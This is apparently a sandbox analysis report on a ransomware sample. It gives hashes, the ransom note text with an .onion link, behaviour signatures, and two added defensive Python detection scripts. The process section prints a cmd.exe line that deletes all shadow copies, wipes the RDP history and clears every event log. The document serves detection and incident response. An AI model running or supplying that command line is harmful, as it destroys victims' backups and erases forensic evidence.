Resubmissions

07/06/2023, 00:18

230607-alrcyagb74 10

07/06/2023, 00:16

230607-akgr4sgb68 10

Analysis

  • max time kernel
    32s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/06/2023, 00:16

General

  • Target

    b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe

  • Size

    113KB

  • MD5

    8d9f3e223f8d5e350b87dc0908fee0a5

  • SHA1

    9fe3060e5cbe3a9ab6c3fb3dee40bd6cd385a6f6

  • SHA256

    b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e

  • SHA512

    d7ffbcdc3bdb72cb1994aae3178feec0edf0384ca57c9dc32bfa95d55d71ffc0dcce809411da9a410c10a1a12677b218807dcb39ab7bc72e04c6519e32314f30

  • SSDEEP

    1536:1wS0lrtfH16vu2Lwn7iqtjl20VoC6wC+kh9YuikxGHgdyo1dRHPUW:70lRv4LR4j4zCjC+kh9Bikw417vUW

Score
10/10

Malware Config

Extracted

Path

C:\HOW_TO_RECOVERY_FILES.txt

Ransom Note
~~~ Hello! Your company has been hacked! ~~~ >>>> Your data are stolen and encrypted >>>> What guarantees that we will not deceive you? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. Life is too short to be sad. Be not sad, money, it is only paper. If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. >>>> You need to contact us by email [email protected] and decrypt some files for free >>>> The data will be published on TOR website if you do not pay the ransom Download and install TOR Browser https://www.torproject.org/ Links for Tor Browser: http://ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion >>>> Your personal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rovide your personal ID in the email >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again!
URLs

http://ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (1328) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.
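The rename and ransom-note signatures above ("Renames multiple (1328) files with added filename extension", "Modifies extensions of user files", the note dropped at C:\HOW_TO_RECOVERY_FILES.txt) describe a file-system footprint that can be checked on a host or a forensic image without running the sample. The following is an added example written for this page, not code from the sandbox or the malware: it takes a directory listing, counts suffixes that were appended on top of a recognised document extension, and combines that with the presence of the ransom note. The listing is constructed, and the appended extension ".locked" is a placeholder; the report does not name the real one.

```python
"""Triage a file listing for the mass-rename pattern typical of ransomware.

Added example (editor's code, not from the report). SAMPLE_LISTING is constructed;
".locked" stands in for whatever extension the sample really appends.
"""
from collections import Counter
from pathlib import PureWindowsPath
from typing import Dict, List

# Extensions that identify ordinary user documents; a second suffix appended
# after one of these is what the "added filename extension" signature describes.
USER_DOC_EXTS = {".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".png", ".txt"}

# Name of the note the report shows being written to the drive root.
RANSOM_NOTE_NAMES = {"HOW_TO_RECOVERY_FILES.TXT"}

# How many files must share one appended suffix before we treat it as mass renaming
# (threshold is an assumption chosen for the example).
RENAME_THRESHOLD = 10


def appended_extensions(paths: List[str]) -> Counter:
    """Count final suffixes that sit on top of a known document extension.

    'report.docx.locked' -> counts '.locked'; 'archive.tar.gz' and 'notes.txt'
    are ignored because their second-to-last suffix is not a document type.
    """
    counts: Counter = Counter()
    for p in paths:
        suffixes = PureWindowsPath(p).suffixes
        if len(suffixes) >= 2 and suffixes[-2].lower() in USER_DOC_EXTS:
            counts[suffixes[-1].lower()] += 1
    return counts


def find_ransom_notes(paths: List[str]) -> List[str]:
    """Return every path whose file name matches a known ransom-note name."""
    return [p for p in paths if PureWindowsPath(p).name.upper() in RANSOM_NOTE_NAMES]


def assess(paths: List[str]) -> Dict[str, object]:
    """Combine the two indicators into a verdict a responder can act on."""
    counts = appended_extensions(paths)
    notes = find_ransom_notes(paths)
    top_ext, top_count = (counts.most_common(1)[0] if counts else (None, 0))
    if top_count >= RENAME_THRESHOLD and notes:
        verdict = "likely_ransomware"
    elif top_count >= RENAME_THRESHOLD:
        verdict = "mass_rename"
    else:
        verdict = "clean"
    return {"appended_ext": top_ext, "count": top_count,
            "ransom_notes": notes, "verdict": verdict}


# Constructed listing: 12 encrypted-looking user files, a few untouched files,
# a desktop.ini (also dropped by the sample, but not a rename) and the note.
SAMPLE_LISTING = (
    [f"C:\\Users\\Admin\\Documents\\report{i}.docx.locked" for i in range(8)]
    + [f"C:\\Users\\Admin\\Pictures\\IMG_{i}.jpg.locked" for i in range(4)]
    + [
        "C:\\Users\\Admin\\Documents\\notes.txt",
        "C:\\Users\\Admin\\Documents\\budget.xlsx",
        "C:\\Users\\Admin\\Documents\\desktop.ini",
        "C:\\Users\\Admin\\Downloads\\tools.tar.gz",
        "C:\\HOW_TO_RECOVERY_FILES.txt",
    ]
)

if __name__ == "__main__":
    print(assess(SAMPLE_LISTING))
```

On a live host the listing would come from `os.walk` over the user profile and any mapped drives (the report shows the sample enumerating non-C: drives too); the counting logic stays the same.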

Processes

  • C:\Users\Admin\AppData\Local\Temp\b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe
    "C:\Users\Admin\AppData\Local\Temp\b95a4443bb8bff80d927ac551a9a5a5cfac3e3e03a5b5737c0e05c75f33ad61e.exe"
    1⤵
    • Modifies extensions of user files
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1060
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1752
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:744
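The cmd.exe child (PID 1060) above carries the whole anti-recovery and anti-forensics sequence in one command line: shadow-copy deletion through vssadmin, removal of the RDP connection history under HKCU\Software\Microsoft\Terminal Server Client, deletion of Default.rdp, and a for-loop that clears every event log wevtutil can enumerate. The example below is added for this page (editor's code, not the sandbox's detection logic): a small rule set run over constructed process-creation records, with the malicious command line copied verbatim from the report and benign look-alikes included to show the rules do not fire on `vssadmin list shadows` or on wevtutil queries. The ATT&CK technique IDs are the editor's mapping, not something the report states.

```python
"""Rule-based triage of process command lines for the behaviours seen in this report.

Added example, not part of the sandbox output. SAMPLE_EVENTS is constructed; the
command line for PID 1060 is copied from the Processes section above.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Verbatim command line of the cmd.exe child shown in the report.
MALICIOUS_CMDLINE = r'''"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"'''


@dataclass
class Finding:
    rule: str
    attack_id: str   # editor's ATT&CK mapping
    evidence: str    # the substring that matched


# (rule name, ATT&CK technique, pattern). Patterns are case-insensitive because
# the sample mixes "Delete Shadows" and lower-case tool names.
RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("rdp_history_wipe", "T1070",
     re.compile(r'reg\s+delete\s+"?HK(?:EY_CURRENT_USER|CU)\\Software\\Microsoft\\Terminal Server Client', re.I)),
    ("default_rdp_removal", "T1070",
     re.compile(r"\bdel\s+Default\.rdp", re.I)),
    ("event_log_clearing", "T1070.001",
     re.compile(r"wevtutil(?:\.exe)?\s+cl\b", re.I)),
]


def scan_command_line(cmdline: str) -> List[Finding]:
    """Return one Finding per rule match (a rule may match more than once)."""
    findings: List[Finding] = []
    for name, attack_id, pattern in RULES:
        for m in pattern.finditer(cmdline):
            findings.append(Finding(name, attack_id, m.group(0)))
    return findings


def severity(findings: List[Finding]) -> str:
    """Shadow deletion plus log clearing in one process is the ransomware
    pre-encryption signature; either alone is still worth a page."""
    rules = {f.rule for f in findings}
    if "shadow_copy_deletion" in rules and "event_log_clearing" in rules:
        return "critical"
    if "shadow_copy_deletion" in rules:
        return "high"
    return "medium"


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run every rule over each event; emit only processes with at least one hit."""
    report = []
    for ev in events:
        findings = scan_command_line(str(ev["cmdline"]))
        if findings:
            report.append({"pid": ev["pid"], "image": ev["image"],
                           "severity": severity(findings), "findings": findings})
    return report


# Constructed process-creation records: the two malicious ones mirror the report,
# the rest are benign administration that must not trigger.
SAMPLE_EVENTS = [
    {"pid": 1060, "image": r"C:\Windows\system32\cmd.exe", "cmdline": MALICIOUS_CMDLINE},
    {"pid": 1752, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 2000, "image": r"C:\Windows\system32\cmd.exe", "cmdline": r'"C:\Windows\system32\cmd.exe" /c dir'},
    {"pid": 2001, "image": r"C:\Windows\system32\vssadmin.exe", "cmdline": "vssadmin.exe list shadows"},
    {"pid": 2002, "image": r"C:\Windows\system32\wevtutil.exe", "cmdline": "wevtutil.exe qe Security /c:5"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], hit["severity"], sorted({f.rule for f in hit["findings"]}))
```

In production the same rules map directly onto Sysmon Event ID 1 or Windows Security 4688 command-line fields; the point of scanning the parent cmd.exe line rather than only the vssadmin child is that the log-clearing loop and the RDP-history wipe never appear as separate process images worth alerting on by themselves.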

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\HOW_TO_RECOVERY_FILES.txt

    Filesize

    2KB

    MD5

    a7df5d0b04949a24ae4e2319a5111a08

    SHA1

    23e43bbf7b6c35d6256d94c247824dfa2f1b7367

    SHA256

    706f048f222cdeedd700d8c4cc161b75a6bab775d8d2b9a588acbade7baa668d

    SHA512

    33bcb315bd2a324496daf616964a9e74d4aad4aa820de18b60791ca1e5f5d80b38704b1aec51fb9905cb5b4b110356bef268d2bfeececd85db506964773e9a52

  • memory/1816-1302-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/1816-2323-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/1816-3609-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB